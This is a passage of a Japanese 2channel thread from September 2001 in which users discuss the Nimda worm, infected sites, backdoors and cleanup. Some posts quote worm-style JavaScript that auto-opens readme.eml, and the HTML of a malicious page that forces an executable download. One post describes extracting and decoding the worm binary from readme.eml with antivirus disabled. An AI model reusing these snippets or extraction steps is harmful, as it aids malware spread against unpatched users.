よく分かっていないのか、ご丁寧にreadme.emlまで、フォルダの中身丸ごとアップしたとおぼしきところもあるなぁ。

592 :591:01/09/26 01:08
かぶった、スマソ。

593 :名無しさん@お腹いっぱい。:01/09/26 01:09
>>583
つーか、ファイル共有でマウントしていれば、自動的に書き込まれるけど。

594 :名無しさん@お腹いっぱい。:01/09/26 01:11
御意。Macでの書き込まれ例もあった。

595 :名無しさん@お腹いっぱい。:01/09/26 01:21
攻撃IP制限の無いnimudaII(仮称)が出ると今度はアジアで爆発するなー。

596 :名無しさん@お腹いっぱい。:01/09/26 01:31
ニムダ発生以降のアクセスログ見ても多少IE6が増えた程度でIE5-5.5の比率は殆ど変わってないや。
Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
これでSP2かどうかは判るの?

597 :名無しさん@お腹いっぱい。:01/09/26 01:47
>>593

なんだが、前スレでApacheでは平気だとかUNIX系は影響ないだとか、ウルサイのがいてねえ。

598 :名無しさん@お腹いっぱい。:01/09/26 01:58
>>549
パワーステージさんはバックドアのこともメールしておいたので
大丈夫っぽいね。

599 :名無しさん@お腹いっぱい。:01/09/26 02:05
>>597
平気っつーか感染したファイルを転送や共有をしない限り
問題はない。
readme.emlやreadme.exeがUnix内でhtmlに感染して増殖する
とでも?
影響あるってのはそういう意味でしか見てないけど。

600 :名無しさん@お腹いっぱい。:01/09/26 02:23
少し前にこのサイト話題になったじゃない、
http://www1.sphere.ne.jp/noone/
ここのサイトとても役に立ったよ。
他の板で”IP抜くぞー”って息巻いてた粘着君に、
”自信有るならここの掲示板にバーカって書き込みして来てよ。”
て言ったらそれ以来、煽りがやんだ。
見た目ちょっと気持ち悪いもんね。

601 :名無しさん@お腹いっぱい。:01/09/26 02:37
>>600
わはは。 使わせてもらうよ。

602 :名無しさん@お腹いっぱい。:01/09/26 08:25
http://wtc.trendmicro.com/wtc/
連休明けの影響だろうけど、昨日一日で日本だけ2倍近く増えてません?

603 :名無しさん@お腹いっぱい。:01/09/26 08:31
これだけ大騒ぎになっているのに、何の対策もとらない馬鹿が多いんだよ。
どこか目立つ場所で啓蒙活動しないとだめかねえ?

604 :名無しさん@お腹いっぱい。:01/09/26 09:00
>>602-603
先週の時点で(普通の企業や人間は)大なり小なり対策を打っているんで、残っているのはDQNの連中だろうね!
そこぞのISPのようにNimdaおよびCodeRedに感染したホストを切断して欲しいもんだ(w
http://www.hotwired.co.jp/news/news/business/story/20010925104.html

605 :名無しさん@お腹いっぱい。:01/09/26 09:04
そして、サービスを停止されてはじめて感染した事実に気づき、ISPへ文句をいううだろうな・・・
「感染したのはお前の所経由なんで責任取れ!」(確かに事実かもしれん)
「MSが悪い!俺は悪くない!だからサービスを使えるようにしろ!」
「他にも感染して使ってる奴がいるだろう! それを全部止めたら俺のも止めていいぞ!」
「で、どうすれば良いんだ! こっちに来てから教えろ!」
 :
 :
 :

606 :>603:01/09/26 09:29
100歩譲って連休中はうごけなかったってのは
まあ許そう。
しかし、今日になってもまだ汚染されたまま
パケット垂れ流してきてる輩は、何とかしてくれ。。。

advaoptical.co.jp
whoisで調べた技術担当者にもメールしたがまだそのまま。。。

607 :・・・:01/09/26 09:34
>>606
技術担当者・・・・・うちの会社の場合、既にそんな奴いないぞ!(w

608 :名無しさん@お腹いっぱい。:01/09/26 10:17
ど、どうでも良いけど昨日からパターンファイル更新できない漏れバスター
。。。。期限切れな気がする。。。
vote落としてきたけど、バスターのパターン942じゃ検出しない。。。
あそこはガセつかます場所じゃないし。
・・・何もこんな時期に期限切れ来る事無いだろう(TT)

609 :料理場:01/09/26 10:24
.eml ファイルの関連付けが Becky! なんですけど、
これなら大丈夫なんですか?

610 :名無しさん@お腹いっぱい。:01/09/26 10:30
>>609
受信・着信メールがすべて不特定多数に転送されています。

611 :名無しさん@お腹いっぱい。:01/09/26 10:33
>>603

新聞はもうVOTEだとかさわいでるしな。まだニムダもおさまってないのに。

だれも発病してない狂牛病なんかよりでかく扱って欲しいよ>啓蒙

612 :名無しさん@お腹いっぱい。:01/09/26 10:33
>>609
Becky!がIEのコンポーネント共有してなきゃ大丈夫?
・・Becky! ユーザーに譲る。
magistrの新種だっけ?メーラー、マルチで使えるの。

613 :名無しさん@お腹いっぱい。:01/09/26 10:36
>>609
〜なら大丈夫なんですか?

っていう質問が多いけど、このテに大丈夫ってないんだよ。


引用:
875 :追加 :01/09/23 00:28
ニムダは感染する環境の人には何度でも感染してくれる所が特徴だ。
それはユーザーの利用意識による所が大きい。
さらに一部は人間の脳に感染し脳をスポンジ化する。

614 :名無しさん@お腹いっぱい。:01/09/26 10:39
>>602

ほんとだ、倍やん!(@@〜☆

615 :名無しさん@お腹いっぱい。:01/09/26 10:42
>>602
別に、破壊ルーチン組んであるわけじゃ無いし、、、
サーバ管理者さんに頑張ってもらって、、、(以下略)

616 :名無しさん@お腹いっぱい。:01/09/26 10:44
ついにちゃんとなおしたみたいだね。よかったよ。

http://www.takara-univ.ac.jp/

617 :名無しさん@お腹いっぱい。:01/09/26 10:46
>>608
9/25更新のパターン945はダウンロードみたいよ。
トレンドマイクロのページみてみな。

618 :名無しさん@お腹いっぱい。:01/09/26 10:48
ここはいつになったら再開するんだ?

http://www.hyundaijapan.co.jp/

このまま会社ごと日本撤退?(w

619 :名無しさん@お腹いっぱい。:01/09/26 10:51
>>617

なんかよくわからないけど、ボタン一発アップデートできないときがありますね。
#押しても反応がない

>>617 のいうように、昨夜もダウンロードでやればできたので、たぶん大丈夫。

620 :名無しさん@お腹いっぱい。:01/09/26 10:55
>>444の会社はどうなったかなぁ・・。

きょうも不正パケット吐きまくったりしてるのかなぁ・・。

621 :608:01/09/26 11:01
>>617
そうなのか。。。
どうりで、オンラインでリダイレクトしてから反応無くなる訳だ。
・・・でも、、2Mなんだよー。ISDNだと辛いよー。

622 :617:01/09/26 11:05
>>608
ごめんごめん。www.trendmicro.co.jpから行くとなんでだか
わかんないよね。
バスター本体メニューのウィルス情報から行くページだが
ここ見るとわかるだろう。
http://vbc.trendmicro.co.jp/vbc/support/index_support.asp

623 :608:01/09/26 11:15
>>622
サンクス。
というか、オンラインで更新しようとする時ウォールのログみてると
リダイレクトさせた後止まるの。言い方不味かった。ごめん。
vbuster-p1k.activeupdate.trendmicro.co.jpから
a1250.g.akamai.netに逝った後。
・・・・http使って転送掛けてるから今時色々弊害有るんかな。
サイトの情報、サンクス。

624 :名無しさん@お腹いっぱい。:01/09/26 12:20
>>603
啓蒙してもムダだそうだ・・。
http://japan.cnet.com/News/2001/Item/010906-2.html?rn

625 :名無しさん@お腹いっぱい。:01/09/26 12:30
これだけ感染被害が出やすくて、次のXPでも問題点が解消されてなければ集団告訴もんじゃない?
絶対、PL法違反だよ。分かってるバグを残して出荷してるんだから。

マイクロソフトはXPを無償で配るべき!!

626 :名無しさん@お腹いっぱい。:01/09/26 12:42
>>625
XPは重そうでいやだす。

627 :名無しさん@お腹いっぱい。:01/09/26 12:47
>>626
まあ、全員にSPのCDを毎回送る、あたりが妥当でしょうな。

ワレのヒトには届かないよ(ワ

628 :名無しさん@お腹いっぱい。:01/09/26 12:48
タダなら重量感があっていいかも(藁
金取るなら、安全かつ軽くして欲しい。

629 :名無しさん@明日があるさ:01/09/26 12:51
あのさ、俺ンとこlinux鯖なんだけどさ、nimdaが出てきた頃から
昼間は大丈夫なんだけど夜になると2ちゃんに書き込めなくなる
んだよね。
「不正proxy使用ですか?・・」 って決まって出るの。

串はずしても変わらないし。。。
何でだろ・・?

630 :名無しさん@お腹いっぱい。:01/09/26 12:52
>>625 つーか毎回小手先とはいえの修正版出してるしねぇ。
今回も修正が先に出てるわけで。(それ見てういるす作ってるんだろうし(w

「問題点が解消されてな」い、にはあたらないんじゃなかろうかと。

631 :名無しさん@お腹いっぱい。:01/09/26 12:54
>>625マニュアルにもウインドウズアップデートせい、って書いてあるし、そこには修正版出てるし。マニュアル読んでないならPL訴訟は成立しないと思われ。

632 :名無しさん@お腹いっぱい。:01/09/26 12:56
>>629
どこにぶら下がってる鯖か知らないけど、このへんか?(勝手な推測
http://www.hotwired.co.jp/news/news/business/story/20010925104.html
同じセグメント内に感染者いたり(w

633 :629:01/09/26 13:07
う〜ん、win鯖じゃないし、ウイルス対策ソフトは最新のを常駐
させてるから今のところ感染はしていないと思うんだが・・・

readme.emiはドコ検索しても見つからないし・・・

634 :名無しさん@お腹いっぱい。:01/09/26 13:07
>>625

>XPでも問題点が解消されてなければ

>マイクロソフトはXPを無償で配るべき!!

問題解消してないならいらん。

635 :名無しさん@お腹いっぱい。:01/09/26 13:09
>>625
>絶対、PL法違反だよ。分かってるバグを残して出荷してるんだから。

あらかじめ告知されてる不具合は製造者責任にあたらん。

636 :名無しさん@お腹いっぱい。:01/09/26 13:12
>>628

金取るほうが低機能だったり>軽い(w

637 : :01/09/26 13:15
>>629
単に串制限してるだけじゃないの?
生IPなら書き込めるっしょ

638 :名無しさん@お腹いっぱい。:01/09/26 13:27
CodeRedかなんかに感染してバックドア置かれちゃったようなところ、あるでしょ。

で、CodeRedってたしか進入できたIPはリストにしてそこを集中攻撃したり、そのリストを配布したりするんだよねぇ?

すると今回完全に駆除しても、IISにSP当ててなかったりすると早晩再感染するということ?

仮にバックドア削除してもほかよりもらう確率高いような・・。

バックドアがあるとかCodeRedにかかったような痕跡持ってるところがニムダにかかってる例が多いからそう思っただけなんだけど。

639 :629:01/09/26 13:37
それが、串はずしても書けないんですよ。。。

640 :↓だってさ:01/09/26 13:42
>>629
ひろゆき

もうだいぶばれてきたようなので白状します。

『不正PROXY使用ですか、、、?
じゃなければ、公開されてるPROXYを使用されてるかも。。。
プロバイダかシステム管理者さんと相談してね。(プロキシーを外部から使えないようにしてくださ
い、、、とか、、、)』
 というように表示してますがこれは事実と異なります。
すまんです。本当はこのように表示すべきでした。

「PROXY規制中! .jp以外を規制してます。」

でもこのように表示するとものすごい非難メールが押し寄せる恐れが
あるためできませんでした。

規制に怒った変質者に逆恨みのテロでも起こされたらいやずら。
(省略されました・・全てを読むにはここを押してください)

641 :名無しさん@お腹いっぱい。:01/09/26 13:44
>>638
>CodeRedにかかったような痕跡持ってるところがニムダにかかってる例が多い

というか、それ狙ってくる。CodeBlueの亜種みたいなもんでしょ。Nimda
・・・んだけど、「redの対策だけパッチ」当ててもredと違う穴突いてくるか
ら再感染。。恐るべし、Concept Virus(CV) V.5

642 :>>638 :01/09/26 13:47
>>641

ああ、やっぱりねぇ。そういうところって、閉鎖になって駆除されたように見えても、すぐ再発してるもんね・・・。

勉強になりました。どうもありがと。

643 :名無しさん@お腹いっぱい。:01/09/26 13:51
>>641
> というか、それ狙ってくる。

あ、それってこれと関係あります?

158 名前:ん〜ま 投稿日:01/09/20 23:31
linuxなのだが試しに、ダミーのroot.exeとか置いたらアクセスが増えてしまったw

644 :641:01/09/26 14:03
>>643
確か、root.exeに対し"HED〜で来るのがブルーで、"GET〜で来るのがNimdaだって誰か言ってた。
逆かも、、忘れた。
んで、有るの確認すると更に次の行動起すよ。同じ所から何発か連続で来ると思うけど。

645 :まっか:01/09/26 14:15
俺もLinux+Apacheでdefault.ida置いたら集中された。
すげぇ鬱だった。

646 :629:01/09/26 14:19
>>640

そうだったのか・・・教えてくれてありがとう。

647 :>>643:01/09/26 14:44
>>644
なるほどねぇ。
よくわかった。ありがとう。
単発のDOSプロンプトで動く駆除ツールって、ニムダが作るファイルしか見てないでしょう?
なんか駆除されてもしっかりroot.exe残ってたりして。

648 :>:01/09/26 14:46
https://www.netsecurity.ne.jp/article/8/2877.html

advaも載ってるんだが、早く気づけよ。

649 :名無しさん@お腹いっぱい。:01/09/26 14:48
スマソ、このスレは最初から目を通しているつもりなのだが、

>●Windows NT 4.0/2000/XP は影響を受けない(ウイルス・ファイルを勝
> 手に実行しないそうです)

って本当ですか?そんなことないですよね(汗

今社内でメールまわってきたのですが。
うちの会社鯖にIIS使ってないせいか、のんきで…

650 :名無しさん@お腹いっぱい。:01/09/26 14:54
>>649
>(ウイルス・ファイルを勝手に実行しないそうです)
全部の端末/鯖にパッチ当てたの確認済みなんだよ。優秀な管理者居るね。
・・・そう思っておいた方がシアワセよ。
更に不景気になりそうだし。テロ関係のお陰で。
早まるのは止めなさい。。

651 :名無しさん@お腹いっぱい。:01/09/26 14:56
>>649

初耳だ(^^;

>>444と同類ではないだろうか。

W98など通常のパソコンには感染しない、というのもあった。何なら感染するんだ?

652 :名無しさん@お腹いっぱい。:01/09/26 14:58
>>650
ニムダ特需でソフトやPCが売れているみたいだぞ。
昨日も重そうにヨドバシの梱包されたIBMの鯖の段ボールを重そうに持ってるオヤヂを複数みたぞ。

653 :名無しさん@お腹いっぱい。:01/09/26 14:59
>650
この不況下で転職など不可能ですので、早まりません(w

>651
…ですよねえ(号泣)
今から管理者に伝えてきます…

654 :名無しさん@お腹いっぱい。:01/09/26 15:00
>>649
> うちの会社鯖にIIS使ってないせいか、のんきで…

ニムダじゃないけど、W2kで、眠っていたIISを外側から起動させられたケースってなかったけ?(^^;

655 :649:01/09/26 15:01
>650 >652
そういう意味かい!!(w

656 :名無しさん@お腹いっぱい。:01/09/26 15:04
>>648

なんでもいいけどここ、明らかにこのスレと前スレチェックしてるね(^^;

657 :650:01/09/26 15:08
>>652
まぢで!!
これでそのオヤヂ達、ネットに繋いだら大喜びするんだろうね。
コレでクリーンな鯖で仕事できるって。

・・・IIS立てるとすれば、、同梱OSのSP、バージョン高ければ良いけど。。
そうか、感染しても大喜びなのか。ウイルスはぢめて見た!って。

658 :名無しさん@お腹いっぱい。:01/09/26 15:20
>>657
新宿ヨドバシの書籍コーナーで赤帽LinuxのCD付きの本を手に取っているおねいさんを見たが、どこまでホンキなのか・・。

659 :657 :01/09/26 15:28
>>658
ナムパすれば良かったのに・・・
対応ドライバの一覧表持って。。。。
ビデオボード、何使ってるの?LANカードは?って。

!!漏れ、早速プリントアウトして張り付いてる!
書籍コーナーに!!
ワクワク!

660 :名無しさん@お腹いっぱい。:01/09/26 15:30
>>659
いつもよりLinuxコーナーにヒトが多いのはナムパ目当てか?!(^^;

661 :名無しさん@お腹いっぱい。:01/09/26 15:33
>>657

>>638-647を読む限り、汚れたIPにスッピンのノーパッチ鯖をいきなりつなぐと・・。

662 :657:01/09/26 15:43
>>661
ヤパーリ、パッチは当てとかないとね。
漏れの回線太いから、in/outトラフィク多いと破れないか心配。。。
・・でわ、書籍コーナーに逝て来る!!

663 :名無しさん@お腹いっぱい。:01/09/26 15:44
>>661

飢えた狼の群れに子羊を投げ込むような

664 :名無しさん@お腹いっぱい。:01/09/26 15:46
>>661
十分、ありえるだろうね・・・
説明書にはケーブル接続した後にセットアップをはじめてくださいって書いてるから!
実際にそれで、3回入れなおして初めて気づいた厨房知ってるし(w

665 :名無しさん@お腹いっぱい。:01/09/26 15:51
>>633
>readme.emiはドコ検索しても見つからないし・・・

だれも>>633に突っ込んであげないんだな…可哀想に。

666 :先行者キャノン ◆9CZFSYK. :01/09/26 16:00
>>629
ひろゆき

もうだいぶばれてきたようなので白状します。

『不正PROXY使用ですか、、、?
じゃなければ、公開されてるPROXYを使用されてるかも。。。
プロバイダかシステム管理者さんと相談してね。(プロキシーを外部から使えないようにしてくださ
い、、、とか、、、)』
 というように表示してますがこれは事実と異なります。
すまんです。本当はこのように表示すべきでした。

「PROXY規制中! .jp以外を規制してます。」

でもこのように表示するとものすごい非難メールが押し寄せる恐れが
あるためできませんでした。

規制に怒った変質者に逆恨みのテロでも起こされたらいやずら。
(省略されました・・全てを読むにはここを押してください)

667 :名無しさん@お腹いっぱい。:01/09/26 16:06
>>662
>ヤパーリ、パッチは当てとかないとね。

そのパッチをネットからダウンロードしよう、なんて腹づもりだったり・・・。

668 :名無しさん@お腹いっぱい。:01/09/26 16:29
>>657
ところがフロントページのインストールされたW2kがバックドア全開で感染していて
ウプしたページがNimuda配布サイトとなってしまうというオチもある。

669 :&:01/09/26 16:34
http://www.ucar-tky.or.jp/mokuji.htm
  readme.eml をダウンロードさせるスクリプトが残っているが
  エラー404になる。
  これで対策されていると言うべきか?否か?
  どっち。
 

670 :名無しさん@お腹いっぱい。:01/09/26 16:39
JR倒壊ニムダ感染してましたー。
葛西社長発表、FWで対処した。これでバッチリにゃ。

671 :名無しさん@お腹いっぱい。:01/09/26 16:40
>>668
そっち有るのね。>フロントページ。
・・・そう言えばフロントページ自体、別バグ無かったっけ??
忘れた。。気のせいか。

672 :名無しさん@お腹いっぱい。:01/09/26 17:03
おいしくねーよ!

http://211.11.222.51/

673 :名無しさん@お腹いっぱい。:01/09/26 17:06
>>669

readme.eml が削除されただけね(^^;

手で削除?

674 :名無しさん@お腹いっぱい。:01/09/26 17:18
ttp://211.11.222.51/
それOCN側回線のダミーページだよ。

http://61.202.212.148/
本体はこちら。疑惑の61だ。内部がまったり感染してそうね。

675 :>673:01/09/26 17:21
>readme.eml が削除されただけね(^^;

>手で削除?
それって セキュ穴とかバックドアとかそのままってことか?

676 :名無しさん@お腹いっぱい。:01/09/26 17:26
>>672
#前略
<SCRIPT language=JavaScript>開いちゃうぞ〜("おいしいねニムダ", null, "resizable=no,top=6000,left=6000")</SCRIPT>
・・・頂きました。。ウマカタです。。

677 :名無しさん@お腹いっぱい。:01/09/26 17:37
>>675

単発ニムダ用の駆除ツールでは、root.exeおとがめなし、なやつもあるみたい。
html内の問題コード削除しないのとか。

678 :名無しさん@お腹いっぱい。:01/09/26 17:43
>>674

あれえ?

こっちは感染していて、
>ttp://211.11.222.51/
> それOCN側回線のダミーページだよ。

こっちは感染していないような。
> http://61.202.212.148/
> 本体はこちら。疑惑の61だ。内部がまったり感染してそうね。

そんなことってある?

679 :名無しさん@お腹いっぱい。:01/09/26 17:56
昼間は見れたのに、また落ちてる・・。

マジで毎晩シャットダウン?(^^;

http://www.takara-univ.ac.jp/

680 :名無しさん@お腹いっぱい。:01/09/26 18:13
>>679

ニムダ対策?夜閉めるって、何か効果あるんだろうか・・。

681 :名無しさん@お腹いっぱい。:01/09/26 18:46
IE5.5 SP2を使ってます。
先程JavaをONのまま、ニムダに感染したHPを踏んでしまいました。
そしたらTemporary Internet Filesフォルダにreadme.emlが出現。

私のPCは感染したんですか?それとも、ダウンロードしただけで
まだ実行されてないんですか?いまいちよくわかりません。
すみませんが、教えてください。

682 :名無しさん@お腹いっぱい。:01/09/26 18:47
>>679
昼間はニムダを超える高速処理の達人が手動で削除していると思われ(薬

683 :名無しさん@お腹いっぱい。:01/09/26 18:49
>>681
?マーク付いてる後者に1票。
ブラウザキャッシュ消しなさい。

684 :名無しさん@お腹いっぱい。:01/09/26 18:53
俺のWIN98SE、この間から起動画面の
WINDOWSってロゴの下に、「By Nimda」って出るんだけど、
新種?

685 :681:01/09/26 18:54
>>683
ありがとうございます。キャッシュ消してみました。
これから、ウイルススキャンしてみようと思います。

686 :名無しさん@お腹いっぱい。:01/09/26 18:57
>>684
まじですか?

687 :684:01/09/26 19:00
>>686
マジダヨ。
新種かな?
ノートンのアンチウィルスでスキャンしても、
何も出ないんだよね。
変なソフトでも実行しちゃったかな?

688 :名無しさん@お腹いっぱい。:01/09/26 19:10
>>687
『*.eml』『*.nws』『readme.exe』『load.exe』あたりを
検索してみそ。
System.iniは「Shell= explorer.exe load.exe -dontrunold」
とかなっていないか?

689 :バイキソ君:01/09/26 19:15
>>684
フーん。。。
その辺いぢるウイルスって聞いたこと無いなーーー。
確かに新種かもねん。
技術的には可能だろうね。起動画面のネタ元、ローカルで
上書きするだけだし。

690 :684:01/09/26 19:17
>>688
やってみたけど無い。
iniファイルも見てみたけど、Shell= explorer.exe
ってなってた。

しかし、この現象は何だろう?覚えが無いんだけど。

691 :バイキソ君:01/09/26 19:20
・・・さてさて。。

692 :名無しさん@お腹いっぱい。:01/09/26 19:25
>>690
自分宛にメール送ってみるとかしてみる?

693 :バイキソ君:01/09/26 19:32
>>684
そうか、起動画面表示のネタ元とにかく流し込んで
設定でパス通せば良いのか。。。
何処で設定してるんだ?レヂストリかな。。。

694 :対策済:01/09/26 19:36
これも同じ仕掛け?

開いただけでダウンロードするか聞いてくる。

http://user.memberz.to/active/001/main.html

695 :名無しさん@お腹いっぱい。:01/09/26 19:41
>>694
lolita.exeを落させようとするものだと思われ。

いやはや、思わぬ弊害かな。>アダルトサイト運営者。

696 :防衛体制万全くん:01/09/26 19:41
>>694
試しにアクセスしてみた。
推測だが、Q2アクセスソフト、または、
ダイヤルアップ書き替えソフトと思われる。

697 :対策済:01/09/26 19:41
<!--IPT LANGUAGE="JavaScript"
<!--
newWin =
window.open("java.html","","width=500,height=200");
// --

</SCRI-->
<META HTTP-EQUIV="Refresh" CONTENT="15;URL=http://www.mars.sphere.ne.jp/yanoo/DTI/lolita.exe">
</HEAD>

698 :名無しさん@お腹いっぱい。:01/09/26 19:43
>694
というか、アダルト巡りはjava切りなさいって(w
敢えて虎穴に入りたいならかまわんが。。。

699 :対策済:01/09/26 19:45
ありがとうございます。


リロードの代わりにダウンロードか・・・・・?

700 :名無しさん@お腹いっぱい。:01/09/26 19:54
>>699
リロードしても、結局対象exeだから、ダウンロードする羽目ね。

701 :名無しさん@お腹いっぱい。:01/09/26 20:15
一つすごく気になっているのだが、MSNがニムダダウンロードサービスをやっていたころ、MSN鯖にはバックドアががあったのだろうか。

702 :名無しさん@お腹いっぱい。:01/09/26 20:18
>>696

あ?てことはQ2業者の中には、今回ニムダが突いたバグを知っていて、未対策ブラウザならだまって設定させていたものがあった・・?

703 :名無しさん@お腹いっぱい。:01/09/26 20:22
>>702
しまった。先にそれに気がついていれば。

704 :名無しさん@お腹いっぱい。:01/09/26 20:28
>>702
可能性有りかも。
あれ利用するのそんなに難しくないし。。。
javaのopenコマンド自体は不正でも何でも無いが、
emlファイルの作り方ね。。

705 :名無しさん@お腹いっぱい。:01/09/26 20:46
何もしていないのに設定されたって言っていた人、いたよな。エロサイト見てたせいで信用はされなかったが(w

706 :684:01/09/26 21:03
なんだか「prof.doc」とか言う添付ファイルがメールについてきたよ。
やっぱりなって感じ。

707 :名無しさん@お腹いっぱい。:01/09/26 21:09

*** readme.exe のソースコード ***

どこかに落ちてなぁい?

708 :名無しさん@お腹いっぱい。:01/09/26 21:11
>>707
作ったやつしか持ってないだろ。

709 :SAGE:01/09/26 21:21
>>707
感染サイトから.eml落してデスアセ取ってた人は初期の頃居たよ。。
このスレパート1から2辺り。
その頃、guestアカウント追加する活動疑問視されてたけど、ソースか
らはレジストリ弄る命令読み取れた。

710 :名無しさん@お腹いっぱい。:01/09/26 21:35
>>706

はやくういるす駆除ソフトメーカーに報告してくれ(´Д`)

711 :名無しさん@お腹いっぱい。:01/09/26 21:36
>>707

こういうのけ?
http://211.11.222.51/

712 :707:01/09/26 22:06
>>709
全てリンク切れ。

どこかにUPしてけれぇ。

713 :名無しさん@お腹いっぱい。:01/09/26 22:18
>>712
ありがとう。タノム。

714 :のうわん:01/09/26 22:52
あーあ、閉鎖されちゃったよ
>>158
>>243
>>266
>>267
>>274
>>276
>>285
>>290
>>329
>>331
>>600
>>601
http://www1.sphere.ne.jp/noone/

有名サイトだったのに。

715 :名無しさん@お腹いっぱい。:01/09/26 22:55
つーか、今プロバイダ系個人サイトの掲示板に


<html><script language="JavaScript">billgates.open("ほげほげ.eml", null, "resizable=n
o,top=6000,left=6000")</script></html>

とかカキコすると、そこ削除されるね(^^;

716 :名無しさん@お腹いっぱい。:01/09/26 23:07
>>715
厨房達には願っても無い情報だ。
検索サイトも感染サイトが引っかからなくなったよ。
スクリプトコードの記述ぐらいは問題無いと思うんだけどなー。

717 : :01/09/26 23:08
>>712
・・・ううう、
一応、リスク犯して作業したの俺じゃ無い。。だからそのままUPするの
は気が引ける。。その彼が個人スペースで公開してたのは確か。
逆アセソースというより、binのダンプデータだった。。。

俺、リンク先残ってるかと思ってROMったの探したけど、丁度PART1から
2に移行する辺りのレス保存できてなかった。。。多分そこでリンク先貼
って有ったと思われ。履歴にも残ってなかった。。
・・やり方としては、readme.eml落して、txtに拡張子変換。base64エ
ンコードしてある添付部分をtxtコピペで切り出しデコード。
readme.exeなんかの名前で保存。
後は、バイナリエディターなりでダンプ取る。拡張子txtにしとく方が無難。
・・・但し、アンチウイルスの常駐切らないとこの作業できない。検出駆除
されちゃう。
ダンプ取ってる最中も自爆しかねない。←コレ一番危険。
本体の拡張子弄るときも、要注意。
・・・ごめんよ。力になれなくて。。。
base64エンコード/デコーダーはフリーで幾つかある。
MIMEBase64ってのでやった。俺は、テキストで覗いただけ。
binエディタもフリーの奴、いっぱい有る。

718 :名無しさん@お腹いっぱい。:01/09/26 23:16
>>716
キャッシュ、、、検出、、、クレーム、、
あまり言いたく無いよ。
流石にreadme.eml改変バージョン、自分サイトで悪意の目的に使う奴は
居ないと思うけど。
・・・これからパソコン買い換えたり新規で買う初心者ユーザー居るわ
けだし。。。潜在的な危険性は否定できない。。。
パッチはアンチウイルスよりも重要。

719 :名無しさん@お腹いっぱい。:01/09/26 23:32
>715
それをメールに貼り付けて送信しウィルスバスターPOP3マシンで受信するとウィルス発見ってなるよ。
既出?

720 :名無しさん@お腹いっぱい。:01/09/26 23:38
>>719
一応外出。
ノートンだとどうも検出しないのね。
メール本文にコピペでいけるよ。>バスター
書き込みtxt添付した場合はどうなのかな。
まぁ、只のいたづらレベルだから、、別に良いけど。
アンチウイルスの動作確認には、安全お手軽でいい方法かな。。
スパム爆弾はいやづら。。

721 : :01/09/26 23:44
ヒュンダイまだ閉鎖って・・・一週間かかって駆除できないのか?

722 :>>618:01/09/26 23:49
>>721
実はここ、昼ごろ復活してました。

http://www.hyundaijapan.co.jp/

でもまだNT鯖のままでした。
つまり(w

723 :名無しさん@お腹いっぱい。:01/09/26 23:49
>>721
どこぞのフォーマット厨房を信じて
HDフォーマットして全入れ替えしてるんじゃない?(藁

724 :名無しさん@お腹いっぱい。:01/09/26 23:53
>>714
心配しなくても大丈夫だよ。
きっと次のネタの仕込みしてるんだろう。

725 :名無しさん@お腹いっぱい。:01/09/26 23:57
>>723

いまとなっては懐かしいねえ>フォーマット厨(w

あぱっ厨・りなっ厨もいましたな。

今日の昼見た限り、少なくともここは改宗したみたいだったのですが・・。
http://www.takara-univ.ac.jp

726 :名無しさん@お腹いっぱい。:01/09/27 00:01
>>724

VOTEさがしにいったのかな?(^^;

---
>>723

ニダ社は

>>652
>>657
>>661

このへん実践してたりな(w

727 :名無しさん@お腹いっぱい。:01/09/27 00:03
>>726

コマンドメール投げると、VOTEを送り返してくれるサイトはどこかにないか?(w

728 :名無しさん@お腹いっぱい。:01/09/27 00:06
バックドア全開でなにされたかわかんねーようなマシンは
フォーマットでもしないと安心できないと思うがどうよ?

729 :名無しさん@お腹いっぱい。:01/09/27 00:08
ネットバブル状態でワレもワレもと開設してそのまま放置だったサイトが、
感染・駆除めんどくなって閉鎖、そのまま放置ってのが増えそうな予感・・。

個人・企業問わず。

なんらかのサービス(情報提供)やネット通販でもやってない限り、大半は会社案内webなんかで大した役にはたってなかったろうけど。

730 :名無しさん@お腹いっぱい。:01/09/27 00:09
>>727
VOTEは英語がサパーリ判らないと意味なし。
よって日本ではただのジャンクメール扱いとなる。
日本語そのものがウィルス対策となっている(ワ

731 :名無しさん@お腹いっぱい。:01/09/27 00:09
>>728

フォーマットしても、パッチなんて思いもよらず再感染していると見てるがどうよ?

732 :名無しさん@お腹いっぱい。:01/09/27 00:10
>>730

そうそう。だからアメリカのMLにでも入らないと入手できないわけよ(w

733 :名無しさん@お腹いっぱい。:01/09/27 00:12
フォーマット論争かよ。723が煽るから。
723は粘着アンチフォーマット君に決定。
同じ議論の繰り返し。
何の進展もない。
もうやめようぜ。

734 :名無しさん@お腹いっぱい。:01/09/27 00:13
>>728
感染
フォーマット
バックアップ復元
なにもかも感染直前に復元
再感染

これの繰り返しと思われ。

735 :728:01/09/27 00:14
>>731
俺もそう思うよ。

736 :名無しさん@お腹いっぱい。:01/09/27 00:17
MSNが再感染しないのは、ある意味スゴイと思われ(w

737 :名無しさん@お腹いっぱい。:01/09/27 00:18
M$他ウィルス対策ページ。
鯖立てている場合の感染はCodered対策がまず先って教えてやれよー。

738 :名無しさん@お腹いっぱい。 :01/09/27 00:18
.emlのファイルの関連づけ削除してしまった

739 :名無しさん@お腹いっぱい。:01/09/27 00:21
>>737

あ( ̄△ ̄;  そういえばそのテにはどこにも書いてないね。

ニムダ用駆除ツールもバックドアおとがめなしだし。

740 :名無しさん@お腹いっぱい。:01/09/27 00:21
>>736

鯖をLinuxにしたと思われ(w

741 :MSNの話題が出てきたのでちと調べてみた:01/09/27 01:10
HTTP/1.0 200 OK
Date: Wed, 26 Sep 2001 16:07:37 GMT
Server: Microsoft-IIS/5.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Content-Length: 78215
Content-Type: text/html

P3Pって・・・・もうこんなモノ吐いてるのか!?

742 :(==):01/09/27 01:53
FORMAT→ osいんすと→ ネットの設定(メルの設定はしない)
→ とりあえず、windows updateに一発目に行って、IE5.01sp2
か5.5SP2を当てる→ ネットを切ってメル設定→ メルの送受信はしないで
安置ウイルスいんすと→ ネット繋いで安置を最新版にあっぷ

理解力が低いやつは、これで完璧っつっといたらええべ??
漏れはこんなめんど〜ナ事はする気ないが(w 

743 :名無しさん@お腹いっぱい。:01/09/27 02:15
>>742
プリインストールされてるメーカー製パソコンをデフォルトで使っているユーザーには
それでも専門用語が多いし手順も多すぎる・・・ハァ。
メーカーが対策済みのリカバリCD−ROMでも出さないといけないのかなハァハァ。

744 :名無しさん@お腹いっぱい。:01/09/27 07:40
>>742

